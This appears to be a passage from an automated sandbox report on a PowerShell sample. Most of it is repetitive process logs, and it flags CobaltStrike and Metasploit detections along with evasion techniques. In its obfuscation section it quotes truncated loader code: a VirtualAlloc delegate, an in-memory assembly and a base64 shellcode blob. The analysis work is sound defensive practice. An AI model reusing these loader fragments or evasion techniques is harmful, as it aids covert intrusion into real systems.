                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior

                      Data Obfuscation

                      barindex
                      Found suspicious powershell code related to unpacking or dynamic code loading
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll VirtualAlloc), (func_get_delegate_type @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$var_buffer = $var_va.Invoke([IntPtr]::Z
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('M
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('bnlicXZrqsZros8DIyMja64+ydzc3Guq/Gui4PerIiPc8GKb05aBdUsnIyMjeWuq2tzzIyMjIyMjIyMjIyIjIy08mS0jlyruApsib+4Cd0tKUANTUUxEUUJOA0BCTU1MVwNBRgNRVk0DSk0DZ2xwA05MR0YNLi4pByMjIyMjIyOmhQ4/4uRgbO
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_0000022EFA0D9744 EncodePointer,__crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_0000022EFA0D9744
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_0000022EF9B4776C push 0000006Ah; retf 0_2_0000022EF9B47784
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_0000022EF9B41F35 push rsp; iretw 0_2_0000022EF9B41F36
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_0000022EFA0E3935 push rsp; iretw 0_2_0000022EFA0E3936
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_0000022EFA0E916C push 0000006Ah; retf 0_2_0000022EFA0E9184
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9B895B77 pushad ; iretd 0_2_00007FFD9B895BB9
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9B89A26C push esp; retf 0_2_00007FFD9B89A26D
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9B9603E9 push cs; iretd 0_2_00007FFD9B96040A
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9B964FAD push ss; iretd 0_2_00007FFD9B9651F2
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9B967F1D push ecx; iretd 0_2_00007FFD9B967F1E
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9B964218 push eax; ret 0_2_00007FFD9B964219
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9B9679EA push esi; iretd 0_2_00007FFD9B9679EB
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9B96158C push edi; ret 0_2_00007FFD9B961598
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9B9654D0 push ds; iretd 0_2_00007FFD9B9654D2
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9B967CAD push esp; iretd 0_2_00007FFD9B967CAE
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_0000022EFA0D01A8 EncodePointer,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0000022EFA0D01A8
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Contains functionality to detect sleep reduction / modifications
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_0000022EFA0C58540_2_0000022EFA0C5854
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_0000022EFA0BFA1C0_2_0000022EFA0BFA1C
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3583Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6247Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAPI coverage: 2.1 %
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_0000022EFA0BFA1C0_2_0000022EFA0BFA1C
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6592Thread sleep time: -11068046444225724s >= -30000sJump to behavior
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_0000022EFA0C1C30 malloc,GetCurrentDirectoryA,FindFirstFileA,GetLastError,free,free,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FindNextFileA,FindClose,0_2_0000022EFA0C1C30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_0000022EFA0C9220 malloc,_snprintf,FindFirstFileA,free,malloc,_snprintf,free,FindNextFileA,FindClose,0_2_0000022EFA0C9220
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: powershell.exe, 00000000.00000002.4121090412.0000022EF9CE5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
                      Source: powershell.exe, 00000000.00000002.4121724697.0000022EF9DBA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.4121724697.0000022EF9DB6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAPI call chain: ExitProcess graph end nodegraph_0-42236
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_0000022EFA0D9744 EncodePointer,__crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_0000022EFA0D9744
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_0000022EFA0D9744 EncodePointer,__crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_0000022EFA0D9744
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_0000022EFA0D9744 EncodePointer,__crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_0000022EFA0D9744
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_0000022EFA0C76F0 InitializeProcThreadAttributeList,GetProcessHeap,HeapAlloc,InitializeProcThreadAttributeList,0_2_0000022EFA0C76F0
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_0000022EFA0E24E0 RtlVirtualUnwind,SetUnhandledExceptionFilter,0_2_0000022EFA0E24E0

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Yara detected Powershell download and execute
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1900, type: MEMORYSTR
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_0000022EFA0CDF50 LogonUserA,GetLastError,ImpersonateLoggedOnUser,GetLastError,0_2_0000022EFA0CDF50
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_0000022EFA0CDEC8 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_0000022EFA0CDEC8
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_0000022EFA0C0920 CreateNamedPipeA,0_2_0000022EFA0C0920
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_0000022EFA0DECB0 GetSystemTimeAsFileTime,0_2_0000022EFA0DECB0
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_0000022EFA0E2068 GetUserNameA,0_2_0000022EFA0E2068
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_0000022EFA0C5E28 GetUserNameA,GetComputerNameA,GetModuleFileNameA,strrchr,GetVersionExA,GetProcAddress,GetModuleHandleA,GetProcAddress,_snprintf,0_2_0000022EFA0C5E28

                      Remote Access Functionality

                      barindex
                      Yara detected CobaltStrike
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1900, type: MEMORYSTR
                      Source: Yara matchFile source: 0.2.powershell.exe.22ef9b10000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.powershell.exe.22efa0b0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.powershell.exe.22efa0b0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.powershell.exe.22ef9b10000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.4114351286.0000022EF1AEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Yara detected MetasploitPayload
                      Source: Yara matchFile source: 3.ps1, type: SAMPLE
                      Source: Yara matchFile source: amsi64_1900.amsi.csv, type: OTHER
                      Source: Yara matchFile source: 00000000.00000002.4122124036.0000022EF9EB0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.4114351286.0000022EF1952000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.4098790194.0000022EE28B3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
